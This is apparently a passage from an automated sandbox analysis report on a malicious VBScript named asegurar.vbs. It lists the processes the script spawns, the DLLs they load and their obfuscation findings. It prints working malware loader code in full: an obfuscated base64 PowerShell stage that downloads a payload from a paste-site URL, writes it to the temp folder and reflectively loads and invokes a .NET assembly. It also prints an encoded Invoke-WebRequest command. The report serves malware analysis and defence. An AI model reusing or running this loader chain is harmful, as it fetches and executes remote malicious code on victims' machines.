;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /cJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat textJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: asegurar.vbsStatic file information: File size 15016182 > 1048576

                    Data Obfuscation

                    barindex
                    Found suspicious powershell code related to unpacking or dynamic code loading
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;$global:?
                    Suspicious powershell command line found
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = 